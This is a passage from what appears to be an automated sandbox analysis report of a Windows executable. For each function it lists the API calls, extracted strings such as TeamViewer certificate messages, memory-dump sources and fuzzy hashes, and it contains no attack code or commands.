Part of subcall function 004A7C66: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 004A7D24

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0049D32E
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 0049D338
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0049D342

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 76f9d63dc022d5c91278f39e0dc5f827774f1a15500cd7c80d2d5ffbe23db647
Instruction ID: abcacea68f617a02f863376324fb94676e1e3b0bbb33b7190eb1451e4af30eea
Opcode Fuzzy Hash: 76f9d63dc022d5c91278f39e0dc5f827774f1a15500cd7c80d2d5ffbe23db647
Instruction Fuzzy Hash: 9EF0C231A0061867CE25B63A881296EBF699FE1B28B00403FF90153256DF6C9E05C6CE

Uniqueness

Uniqueness Score: -1.00%

Function 004A2A07, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 004A2A10

Part of subcall function 00497409: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 0049D78E

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 004A2A34
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 004A2A47
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 004A2A50

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: c0143ccfabe43e128c57ead627ee14c0834549db8fa2014397d768214be6d96d
Instruction ID: 79d7f237883926acd01cd7639de2b0905e99b5cc0ed5da12db03205ac79bc8a6
Opcode Fuzzy Hash: c0143ccfabe43e128c57ead627ee14c0834549db8fa2014397d768214be6d96d
Instruction Fuzzy Hash: 52F0A771200A108FE631AB199901F6B23949F56318F00841FE56A96282CBACEC43C759

Uniqueness

Uniqueness Score: -1.00%

Function 0046C8E7, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,0045BA1B,00000000,?,?,0046B6C4,?,00000001,?,00000001,?,00462DEB,00000000,?,00000001), ref: 0046C8FE
GetLastError.KERNEL32(?,0046B6C4,?,00000001,?,00000001,?,00462DEB,00000000,?,00000001,00000000,00000001,?,0046333F,0045B9AA), ref: 0046C90A

Part of subcall function 0046C8D0: CloseHandle.KERNEL32(FFFFFFFE,0046C91A,?,0046B6C4,?,00000001,?,00000001,?,00462DEB,00000000,?,00000001,00000000,00000001), ref: 0046C8E0

___initconout.LIBCMT ref: 0046C91A

Part of subcall function 0046C88D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0046C8BC,0046B6B1,00000001,?,00462DEB,00000000,?,00000001,00000000), ref: 0046C8A0

WriteConsoleW.KERNEL32(?,?,0045BA1B,00000000,?,0046B6C4,?,00000001,?,00000001,?,00462DEB,00000000,?,00000001,00000000), ref: 0046C92F

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 35aea90f68c35d971b4156e6813948fdc996d40e15bc5a5506467efdad55d40e
Instruction ID: 4fb1d6e18b274fb73fb5de91e5de5ec0b8c93719e66d75dae326c7d36e0ed871
Opcode Fuzzy Hash: 35aea90f68c35d971b4156e6813948fdc996d40e15bc5a5506467efdad55d40e
Instruction Fuzzy Hash: 55F0C736501115BBCF222FA5DC48DAB3F66FB483B1F048125FE5996130D7318C20DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044F452, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0044F3EF,00000064), ref: 0044F475
LeaveCriticalSection.KERNEL32(004FA47C,?,?,0044F3EF,00000064,?,?,?,004233BA,004FC3F8,00422713,2B7C607E,?,?,?), ref: 0044F47F
WaitForSingleObjectEx.KERNEL32(?,00000000,?,0044F3EF,00000064,?,?,?,004233BA,004FC3F8,00422713,2B7C607E,?,?,?), ref: 0044F490
EnterCriticalSection.KERNEL32(004FA47C,?,0044F3EF,00000064,?,?,?,004233BA,004FC3F8,00422713,2B7C607E,?,?,?), ref: 0044F497

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 806bba5a9cfe22ff8bedbbefee8e532871d5e3f263f3592ae05c67aa5559b940
Instruction ID: 6756e0c9b78d63873a928763ac215258691fcc6da1e05bb7396bb882c7d3ea8c
Opcode Fuzzy Hash: 806bba5a9cfe22ff8bedbbefee8e532871d5e3f263f3592ae05c67aa5559b940
Instruction Fuzzy Hash: BAE09231641138BBDB116F64EC0CAAA3F28EB08711B004132FB8D522208BA81C31DBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0045E430, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045E439

Part of subcall function 00460DBA: HeapFree.KERNEL32(00000000,00000000,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?), ref: 00460DD0
Part of subcall function 00460DBA: GetLastError.KERNEL32(?,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?,?), ref: 00460DE2

_free.LIBCMT ref: 0045E44C
_free.LIBCMT ref: 0045E45D
_free.LIBCMT ref: 0045E46E

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a23f8e5654acdb5112d698fb4f79b1e8d65711d36983e1e8745c36b1cea41823
Instruction ID: 5431558560cd23cbd5b93af4f824d3b26504eee8771d84ee151610c3c64328cf
Opcode Fuzzy Hash: a23f8e5654acdb5112d698fb4f79b1e8d65711d36983e1e8745c36b1cea41823
Instruction Fuzzy Hash: 5EE092F1810360EB8662AF6AED458AB3A62F755714305462BF82C12232DF3D1572DBDF

Uniqueness

Uniqueness Score: -1.00%

Function 0042EC40, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 317COMMON

Download Yara Rule

APIs

_mbstowcs.LIBCMT ref: 0042EE2D

Strings

exception: , xrefs: 0042EE76
~`|+, xrefs: 0042ED94

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _mbstowcs
String ID: exception: $~`|+
API String ID: 686213805-1558614106
Opcode ID: f473a385a62391bf000e42c9ff790f4c3c3e32fc14a7d0d9150a2e1577616d93
Instruction ID: 72377270f3670ce62c2610a3f60979085ca8d61656b49e206b5c2fef917185d4
Opcode Fuzzy Hash: f473a385a62391bf000e42c9ff790f4c3c3e32fc14a7d0d9150a2e1577616d93
Instruction Fuzzy Hash: 6EB1A931B002149BDB18DB7AED85BAEB7B5EF85304FA4462EE411D7381DB3CAA04C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042C51D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00439960: GetLastError.KERNEL32(2B7C607E,?,00000000), ref: 00439E90
Part of subcall function 00439960: GetTickCount.KERNEL32 ref: 00439E9F
Part of subcall function 00439960: GetCurrentThreadId.KERNEL32 ref: 00439EC9

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,10000080,00000000,2B7C607E,?,?,?), ref: 0042C74B

Strings

VerifyTeamViewerCertificate: File for loading certificate is %1%, xrefs: 0042C51D
VerifyTeamViewerCertificate(): CreateFile failed: , xrefs: 0042C765

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCreateCurrentErrorFileLastThreadTick
String ID: VerifyTeamViewerCertificate(): CreateFile failed: $VerifyTeamViewerCertificate: File for loading certificate is %1%
API String ID: 1452323701-1522239251
Opcode ID: c0cd8b8e45e82b73fccef56d02a08610b1c7c65f0b1b416ae1e89f0edf4a9023
Instruction ID: 1e80aa853c608fd093baa948c1e349cf9427aad6f8bb1e14cbc4875ec326e853
Opcode Fuzzy Hash: c0cd8b8e45e82b73fccef56d02a08610b1c7c65f0b1b416ae1e89f0edf4a9023
Instruction Fuzzy Hash: E2710531B101259BEF28DB24ED8979DB762AF85308F60819EE105973D1DB7C5E84CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042ED80, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

_mbstowcs.LIBCMT ref: 0042EE2D

Strings

exception: , xrefs: 0042EE76
~`|+, xrefs: 0042ED94

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _mbstowcs
String ID: exception: $~`|+
API String ID: 686213805-1558614106
Opcode ID: 15a94c2697d1c27368e7c1667ca26454d3705f1a45afe03b739d5c927ea8a3e6
Instruction ID: 3fc810396e3996f0ac0c1d24136b2176ec0df8f6391396cef780f42892311eb1
Opcode Fuzzy Hash: 15a94c2697d1c27368e7c1667ca26454d3705f1a45afe03b739d5c927ea8a3e6
Instruction Fuzzy Hash: 51616831F001149BDB08CB79DD49BAEB7B6EF85304F64862EE405A7385DB3C6A05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045D00D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0045D09D

Strings

pow, xrefs: 0045D075, 0045D092

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b0a3e0d6e3b7a30344a53ee4689a33ded14995a8d38d737d7136741421ed51f2
Instruction ID: f8ebfdcaeb858ee6ac9b11d2e3e4860e2a447c47c87a8a744b6dc2a0d993c253
Opcode Fuzzy Hash: b0a3e0d6e3b7a30344a53ee4689a33ded14995a8d38d737d7136741421ed51f2
Instruction Fuzzy Hash: 7D518261E05A0296CB217714CE0536B7794DF40B06F208D6BE8D1423EAFB3C8C9AD64F

Uniqueness

Uniqueness Score: -1.00%

Function 00492DB0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00492F39
__Mtx_init_in_situ.LIBCPMT ref: 00492F7A

Strings

~`|+, xrefs: 00492DC7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Mtx_init_in_situMtx_unlock
String ID: ~`|+
API String ID: 4113383456-3443854377
Opcode ID: c9e8111d39376ff1464d4c34d36e07b11b73f48ad92a50a42ba0c1086b638dba
Instruction ID: 7d8a7e4a827de99e8a6609158a85e20247caa2b186083af3ef8963898e66d3ca
Opcode Fuzzy Hash: c9e8111d39376ff1464d4c34d36e07b11b73f48ad92a50a42ba0c1086b638dba
Instruction Fuzzy Hash: 755192B1E002099BDF14DF99DAC1BAEBBB1FB44304F14457AE4059B385D7B89D04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043A420, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 159threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043A4F4
SetEvent.KERNEL32(00000000), ref: 0043A5F6

Strings

~`|+, xrefs: 0043A4D7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventThread
String ID: ~`|+
API String ID: 2592414440-3443854377
Opcode ID: e78d43eaf10ae557b3e55f12e02316f559213d1060f349a11e689fad68d2a204
Instruction ID: 647f9ba2c244e7ab3282fe5fa9dffd2d89417017fa891b1db50d4da958e94850
Opcode Fuzzy Hash: e78d43eaf10ae557b3e55f12e02316f559213d1060f349a11e689fad68d2a204
Instruction Fuzzy Hash: 5951E371A002019FDB14CF64C888BAAB3B5FF48318F24062ED58697791D779BD56CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0046D340, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0046D492

Strings

: this object doesn't support multiple channels, xrefs: 0046D3C1
~`|+, xrefs: 0046D357, 0046D464

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: : this object doesn't support multiple channels$~`|+
API String ID: 2659868963-368401057
Opcode ID: 9cb8893a102cb8516f5457d65423c95121b371f6e7b21bc1839c6fd5b87a5b0c
Instruction ID: 898a8ca31bb8405928ae02e12314a089a4051e1ca416e5d3d20fef92a1656093
Opcode Fuzzy Hash: 9cb8893a102cb8516f5457d65423c95121b371f6e7b21bc1839c6fd5b87a5b0c
Instruction Fuzzy Hash: EC417F71A00609EBDB14CF59C841B9EFBF8FF49714F10861BE415A3780EB78A544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0045E0ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045E15B
_free.LIBCMT ref: 0045E17B

Strings

~`|+, xrefs: 0045E109, 0045E199

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: ~`|+
API String ID: 269201875-3443854377
Opcode ID: 8f503c80158313cf0ec463b191451a55fdeddbbc1b8964775175e5897024daab
Instruction ID: ea20c35a83a3806149352c319cd0c55721e4f92aae461dbc7b5335c5d041fab4
Opcode Fuzzy Hash: 8f503c80158313cf0ec463b191451a55fdeddbbc1b8964775175e5897024daab
Instruction Fuzzy Hash: 5741E732E00214AFCB14DF69C880A5EB7E6EF89705F1544ADE905EB342EB35EE05CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00492FD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 004930E9
__Mtx_init_in_situ.LIBCPMT ref: 00493129

Strings

~`|+, xrefs: 00492FE6

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Mtx_init_in_situMtx_unlock
String ID: ~`|+
API String ID: 4113383456-3443854377
Opcode ID: 7cfef7e1e3839bca033fa26050846bf2b60c66cfa69e3f2bfe3e93228745929d
Instruction ID: cad796d889186d02653b5b916ef5941bda07dbd3286869b2beb0decf817c4363
Opcode Fuzzy Hash: 7cfef7e1e3839bca033fa26050846bf2b60c66cfa69e3f2bfe3e93228745929d
Instruction Fuzzy Hash: 1441B670E0020D9BDF10DFE5D942BAEBBF5EB55704F10417AE804A3781E7795A04D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00452E1E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00452E43

Strings

MOC, xrefs: 00452E55
RCC, xrefs: 00452E5D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 88f71b8d206c5bf117f8e03a331379a9d04aed21f1bddfcb23d7ec6b7690bf63
Instruction ID: a228fad7fdbc1d120b969cd7e6abbc2ba4654f65857a6f9a8573518bce7c3729
Opcode Fuzzy Hash: 88f71b8d206c5bf117f8e03a331379a9d04aed21f1bddfcb23d7ec6b7690bf63
Instruction Fuzzy Hash: 3841AB72900209AFCF15CF94DE81AEE7BB5BF09305F14819BFD0467222D3B99954DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0046305D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,004633A6,0045B9AA,00000001,00000000,0045BA1B,?,?,?,0045B9AA,?,?), ref: 00463146
GetLastError.KERNEL32(004633A6,0045B9AA,00000001,00000000,0045BA1B,?,?,?,0045B9AA,?,?,?,004ED2E0,0000002C,0045BA1B,?), ref: 00463176

Strings

~`|+, xrefs: 0046306C

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: ~`|+
API String ID: 442123175-3443854377
Opcode ID: 3edcf19083fd50916ca29864ab285c120b8da5177220d512d6b09e4b75739dd0
Instruction ID: d1e528de1fddc6cc03ecc834b6dd6ec180170813a3676d3550950627032906b5
Opcode Fuzzy Hash: 3edcf19083fd50916ca29864ab285c120b8da5177220d512d6b09e4b75739dd0
Instruction Fuzzy Hash: EE318371B00219AFDB24CF69DD81AEAB3B5EB45301F1440AAE505D7290E674EE84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004648FF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 004649CF
__freea.LIBCMT ref: 004649D8

Part of subcall function 00460DF4: RtlAllocateHeap.NTDLL(00000000,?,00000010,?,00495EEF,?,004F5494,?,004844C1,?,00000010,?,004F5494), ref: 00460E26

Strings

~`|+, xrefs: 00464907

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapStringType__freea
String ID: ~`|+
API String ID: 4073780324-3443854377
